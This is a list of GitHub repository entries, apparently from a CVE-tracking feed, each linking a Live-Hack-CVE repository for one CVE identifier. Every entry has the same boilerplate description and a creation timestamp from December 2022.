**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24379 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24379](https://github.com/Live-Hack-CVE/CVE-2020-24379) create time: 2022-12-23T07:14:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15783](https://github.com/Live-Hack-CVE/CVE-2020-15783) create time: 2022-12-23T07:14:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27386](https://github.com/Live-Hack-CVE/CVE-2020-27386) create time: 2022-12-23T07:14:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14393 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14393](https://github.com/Live-Hack-CVE/CVE-2020-14393) create time: 2022-12-23T07:14:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14198](https://github.com/Live-Hack-CVE/CVE-2020-14198) create time: 2022-12-23T07:13:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25247 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25247](https://github.com/Live-Hack-CVE/CVE-2020-25247) create time: 2022-12-23T07:13:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13294](https://github.com/Live-Hack-CVE/CVE-2020-13294) create time: 2022-12-23T07:13:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24889 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24889](https://github.com/Live-Hack-CVE/CVE-2020-24889) create time: 2022-12-23T07:13:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15652 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15652](https://github.com/Live-Hack-CVE/CVE-2020-15652) create time: 2022-12-23T07:13:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14385 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14385](https://github.com/Live-Hack-CVE/CVE-2020-14385) create time: 2022-12-23T07:13:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1319 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1319](https://github.com/Live-Hack-CVE/CVE-2020-1319) create time: 2022-12-23T07:13:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25638 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25638](https://github.com/Live-Hack-CVE/CVE-2020-25638) create time: 2022-12-23T07:11:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12351 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12351](https://github.com/Live-Hack-CVE/CVE-2020-12351) create time: 2022-12-23T07:11:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28367 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28367](https://github.com/Live-Hack-CVE/CVE-2020-28367) create time: 2022-12-23T07:11:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28491](https://github.com/Live-Hack-CVE/CVE-2020-28491) create time: 2022-12-23T07:11:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14343 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14343](https://github.com/Live-Hack-CVE/CVE-2020-14343) create time: 2022-12-23T07:11:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9492 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9492](https://github.com/Live-Hack-CVE/CVE-2020-9492) create time: 2022-12-23T07:11:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36242 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36242](https://github.com/Live-Hack-CVE/CVE-2020-36242) create time: 2022-12-23T07:11:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21682 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21682](https://github.com/Live-Hack-CVE/CVE-2020-21682) create time: 2022-12-23T07:10:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21678 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21678](https://github.com/Live-Hack-CVE/CVE-2020-21678) create time: 2022-12-23T07:09:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21684 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21684](https://github.com/Live-Hack-CVE/CVE-2020-21684) create time: 2022-12-23T07:09:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21683 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21683](https://github.com/Live-Hack-CVE/CVE-2020-21683) create time: 2022-12-23T07:09:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21680 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21680](https://github.com/Live-Hack-CVE/CVE-2020-21680) create time: 2022-12-23T07:09:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21681 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21681](https://github.com/Live-Hack-CVE/CVE-2020-21681) create time: 2022-12-23T07:09:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21947](https://github.com/Live-Hack-CVE/CVE-2021-21947) create time: 2022-12-23T07:15:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21946](https://github.com/Live-Hack-CVE/CVE-2021-21946) create time: 2022-12-23T07:15:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21945](https://github.com/Live-Hack-CVE/CVE-2021-21945) create time: 2022-12-23T07:15:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21944 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21944](https://github.com/Live-Hack-CVE/CVE-2021-21944) create time: 2022-12-23T07:15:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3712 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3712](https://github.com/Live-Hack-CVE/CVE-2021-3712) create time: 2022-12-23T07:14:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3711 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3711](https://github.com/Live-Hack-CVE/CVE-2021-3711) create time: 2022-12-23T07:14:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42694 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42694](https://github.com/Live-Hack-CVE/CVE-2021-42694) create time: 2022-12-23T07:13:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21300 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21300](https://github.com/Live-Hack-CVE/CVE-2021-21300) create time: 2022-12-23T07:11:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3177 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3177](https://github.com/Live-Hack-CVE/CVE-2021-3177) create time: 2022-12-23T07:11:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26720 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26720](https://github.com/Live-Hack-CVE/CVE-2021-26720) create time: 2022-12-23T07:11:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23926 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23926](https://github.com/Live-Hack-CVE/CVE-2021-23926) create time: 2022-12-23T07:11:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3918](https://github.com/Live-Hack-CVE/CVE-2021-3918) create time: 2022-12-23T07:10:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3496 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3496](https://github.com/Live-Hack-CVE/CVE-2021-3496) create time: 2022-12-23T07:09:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33560 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33560](https://github.com/Live-Hack-CVE/CVE-2021-33560) create time: 2022-12-23T07:09:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23169 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23169](https://github.com/Live-Hack-CVE/CVE-2021-23169) create time: 2022-12-23T07:09:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40528 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40528](https://github.com/Live-Hack-CVE/CVE-2021-40528) create time: 2022-12-23T07:09:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39537 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39537](https://github.com/Live-Hack-CVE/CVE-2021-39537) create time: 2022-12-23T07:09:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41160](https://github.com/Live-Hack-CVE/CVE-2021-41160) create time: 2022-12-23T07:09:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32765 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32765](https://github.com/Live-Hack-CVE/CVE-2021-32765) create time: 2022-12-23T07:09:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3753 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3753](https://github.com/Live-Hack-CVE/CVE-2021-3753) create time: 2022-12-23T07:09:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20304](https://github.com/Live-Hack-CVE/CVE-2021-20304) create time: 2022-12-23T07:09:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3800](https://github.com/Live-Hack-CVE/CVE-2021-3800) create time: 2022-12-23T07:08:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33544](https://github.com/Live-Hack-CVE/CVE-2021-33544) create time: 2022-12-23T07:08:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23414 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23414](https://github.com/Live-Hack-CVE/CVE-2021-23414) create time: 2022-12-23T07:07:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27219 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27219](https://github.com/Live-Hack-CVE/CVE-2021-27219) create time: 2022-12-23T06:32:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27218 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27218](https://github.com/Live-Hack-CVE/CVE-2021-27218) create time: 2022-12-23T06:32:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21693](https://github.com/Live-Hack-CVE/CVE-2021-21693) create time: 2022-12-23T06:32:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37714 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37714](https://github.com/Live-Hack-CVE/CVE-2021-37714) create time: 2022-12-23T06:29:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35940 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35940](https://github.com/Live-Hack-CVE/CVE-2021-35940) create time: 2022-12-23T06:29:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33558](https://github.com/Live-Hack-CVE/CVE-2021-33558) create time: 2022-12-23T06:28:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35507](https://github.com/Live-Hack-CVE/CVE-2022-35507) create time: 2022-12-23T07:15:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1050 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1050](https://github.com/Live-Hack-CVE/CVE-2022-1050) create time: 2022-12-23T07:14:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43747 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43747](https://github.com/Live-Hack-CVE/CVE-2022-43747) create time: 2022-12-23T07:11:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24793 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24793](https://github.com/Live-Hack-CVE/CVE-2022-24793) create time: 2022-12-23T07:11:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24792 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24792](https://github.com/Live-Hack-CVE/CVE-2022-24792) create time: 2022-12-23T07:10:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28386](https://github.com/Live-Hack-CVE/CVE-2022-28386) create time: 2022-12-23T07:10:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21704](https://github.com/Live-Hack-CVE/CVE-2022-21704) create time: 2022-12-23T07:10:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32209 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32209](https://github.com/Live-Hack-CVE/CVE-2022-32209) create time: 2022-12-23T07:10:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40259 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40259](https://github.com/Live-Hack-CVE/CVE-2022-40259) create time: 2022-12-23T07:10:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45315 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45315](https://github.com/Live-Hack-CVE/CVE-2022-45315) create time: 2022-12-23T07:10:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45313](https://github.com/Live-Hack-CVE/CVE-2022-45313) create time: 2022-12-23T07:10:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23437](https://github.com/Live-Hack-CVE/CVE-2022-23437) create time: 2022-12-23T07:09:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25258 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25258](https://github.com/Live-Hack-CVE/CVE-2022-25258) create time: 2022-12-23T07:09:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3357 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3357](https://github.com/Live-Hack-CVE/CVE-2022-3357) create time: 2022-12-23T07:09:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32795 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32795](https://github.com/Live-Hack-CVE/CVE-2022-32795) create time: 2022-12-23T07:08:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32872 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32872](https://github.com/Live-Hack-CVE/CVE-2022-32872) create time: 2022-12-23T07:08:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38013 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38013](https://github.com/Live-Hack-CVE/CVE-2022-38013) create time: 2022-12-23T07:08:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26945](https://github.com/Live-Hack-CVE/CVE-2022-26945) create time: 2022-12-23T07:08:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3646 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3646](https://github.com/Live-Hack-CVE/CVE-2022-3646) create time: 2022-12-23T07:08:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1586](https://github.com/Live-Hack-CVE/CVE-2022-1586) create time: 2022-12-23T07:08:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1587](https://github.com/Live-Hack-CVE/CVE-2022-1587) create time: 2022-12-23T07:08:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26336 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26336](https://github.com/Live-Hack-CVE/CVE-2022-26336) create time: 2022-12-23T07:08:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32894 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32894](https://github.com/Live-Hack-CVE/CVE-2022-32894) create time: 2022-12-23T07:07:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28813 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28813](https://github.com/Live-Hack-CVE/CVE-2022-28813) create time: 2022-12-23T07:07:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32886](https://github.com/Live-Hack-CVE/CVE-2022-32886) create time: 2022-12-23T07:07:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32912 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32912](https://github.com/Live-Hack-CVE/CVE-2022-32912) create time: 2022-12-23T07:07:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32917 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32917](https://github.com/Live-Hack-CVE/CVE-2022-32917) create time: 2022-12-23T07:07:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3203](https://github.com/Live-Hack-CVE/CVE-2022-3203) create time: 2022-12-23T07:07:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45149 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45149](https://github.com/Live-Hack-CVE/CVE-2022-45149) create time: 2022-12-23T07:07:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45151 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45151](https://github.com/Live-Hack-CVE/CVE-2022-45151) create time: 2022-12-23T07:07:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14439 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14439](https://github.com/Live-Hack-CVE/CVE-2017-14439) create time: 2022-12-23T05:33:09Z

